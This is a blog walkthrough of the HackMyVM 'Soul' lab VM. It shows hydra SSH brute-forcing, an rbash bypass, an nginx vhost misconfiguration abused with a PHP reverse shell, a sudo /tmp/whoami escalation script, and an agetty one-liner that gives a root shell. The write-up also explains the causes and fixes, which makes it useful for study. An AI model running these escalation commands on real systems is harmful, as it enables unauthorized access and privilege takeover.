Windy's little blog

All the odds and ends of life, and I like CTF.

HackMyVm Soul Walkthrough (nginx bad config, privilege escalation through agetty)

(A few posts written in English so that international readers can find them by search. They are all simple sentences, so readers in China should not find them hard going.)


A very tricky VM, difficulty level hard; it can be downloaded here.


First, use nmap to scan ports.

Gobuster to brute-force directories and files on port 80; found nothing.

There is only one image on index.html.

Download it and extract pass.txt from the jpg file.

Use hydra to brute-force the SSH username.

Logged in as user daniel through SSH, but the login shell is a restricted bash.

Log in again, this time asking SSH for a pseudo-terminal (-t) and a command to run instead of the login shell, which bypasses the restricted bash:

ssh daniel@192.168.56.35 -t "bash --noprofile"

This works because sshd hands the command to the user's login shell (rbash -c "bash --noprofile"): "bash" contains no slash, so rbash lets it run, and --noprofile skips the profile that would re-apply the restrictions. The -t only matters for getting an interactive terminal; the bypass itself comes from the command. It would not help against a restriction enforced server-side with ForceCommand.

There are three users in the home directory, and the user flag is in gabriel's home, so we need to escalate to another user.

Here is the most tricky part. As user daniel, I spent a lot of time browsing the VM but found nothing. Then I asked for help from this great guy @d4t4s3c. In /etc/nginx/sites-available we can find a virtual host name: lonelysoul.hmv.

In fact, if we put a PHP file into /var/www/html and request it directly by IP, it is not interpreted: the default server has no PHP handler and returns the source as plain text. Requested as lonelysoul.hmv/xxx.php, the same file is passed to PHP and executed, because the virtual host for that name does have a PHP location block over the same document root. So the intended second user is www-data, not one of the other two accounts in /home.
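As an added example (not the box's real configuration, which the post only shows in a screenshot), here is a minimal nginx layout that reproduces the behaviour described above. The PHP-FPM socket path and the fastcgi snippet name are assumptions; the two server blocks and the shared document root are the point.

```nginx
# Added example, not the box's own config. Socket path and snippet name are assumed.

# Default server: what a client reaches by bare IP. PHP files under the
# document root are served as plain text because nothing forwards them to PHP.
server {
    listen 80 default_server;
    server_name _;
    root /var/www/html;
    index index.html;
}

# Virtual host for lonelysoul.hmv: same document root, but requests for
# .php files are handed to PHP-FPM, so a file dropped into /var/www/html
# by a local user runs as www-data.
server {
    listen 80;
    server_name lonelysoul.hmv;
    root /var/www/html;
    index index.php index.html;

    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php-fpm.sock;   # assumed socket path
    }
}
```

Two practical notes. First, the attacking machine does not need an /etc/hosts entry: nginx selects the server block from the Host header alone, so `curl -H 'Host: lonelysoul.hmv' http://192.168.56.35/xxx.php` hits the PHP-enabled vhost. Second, the real weakness is the combination of a PHP-executing vhost with a document root that a low-privileged user (daniel) can write to; hiding the hostname changes nothing, while making /var/www/html read-only for daniel (or serving PHP from a root no interactive user can write) closes it.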


Upload a PHP reverse shell into /var/www/html and request it through the virtual host name with curl; we get a reverse shell as user www-data.

User www-data can run /tmp/whoami with sudo, so we create a file named whoami in /tmp whose content is just: bash. Because /tmp is world-writable, whoever controls that path controls what sudo executes.

Sudo to user gabriel, and now we have the user flag.
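The two steps above, as an added example rather than the post's own commands. It assumes the sudoers entry on the box has the shape `www-data ALL=(gabriel) NOPASSWD: /tmp/whoami` (the exact line is only visible in a missing screenshot) and is meant to be pasted into the www-data reverse shell. The walkthrough's one-word file (`bash`) worked on the box; an explicit shebang plus `exec` does not depend on how sudo treats a script with no interpreter line, and checking `sudo -l` first avoids guessing.

```sh
#!/bin/sh
# Added example, not from the original walkthrough.
# Assumed sudoers rule on the box (not reproduced in the post):
#   www-data ALL=(gabriel) NOPASSWD: /tmp/whoami
# /tmp is world-writable, so whoever can write /tmp/whoami decides what
# sudo runs as gabriel.

# Write the stand-in "whoami" that sudo will execute: an interactive bash.
make_sudo_wrapper() {
    path="$1"
    printf '#!/bin/bash\nexec /bin/bash -i\n' > "$path"
    chmod 755 "$path"
}

# Confirm the rule really exists before relying on it. -n never prompts for
# a password, so this is safe to run from a non-interactive reverse shell.
sudo_rule_present() {
    sudo -n -l 2>/dev/null | grep -F -q -- "$1"
}

# Full chain as typed in the www-data shell: plant the wrapper, then run it
# as gabriel through the sudo rule.
escalate_to_gabriel() {
    make_sudo_wrapper /tmp/whoami
    if sudo_rule_present /tmp/whoami; then
        sudo -u gabriel /tmp/whoami
    else
        echo "no sudo rule for /tmp/whoami; nothing to abuse" >&2
        return 1
    fi
}
```

Usage on the target: source the file (or paste it) and call `escalate_to_gabriel`; the interactive bash it spawns runs as gabriel, and `cat ~/user.txt` style retrieval follows from there.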

Next, user gabriel can run hping3 with sudo; from its interactive prompt, /bin/sh spawns a shell, which escalates to user peter.

Here is the second hard part. We can see that /usr/sbin/agetty may be a useful file for privilege escalation, so I googled a lot but found no answer.

Thanks to the great Spanish guy @d4t4s3c. Here is the magic command:

/usr/sbin/agetty  -o -p -a  root -l /bin/bash tty

Why it works: -l replaces the login program (normally /bin/login) with /bin/bash; -a root sets the autologin user; -o replaces the default login options ("-- \u") with the single string -p, so bash is started as bash -p, its privileged mode, which keeps the effective user id instead of dropping to the real one; the last argument, tty, is the terminal agetty attaches to. This only yields root when agetty itself runs with root privileges, for example as a set-uid root binary, which is presumably why it stood out during enumeration (the screenshot is not reproduced here).
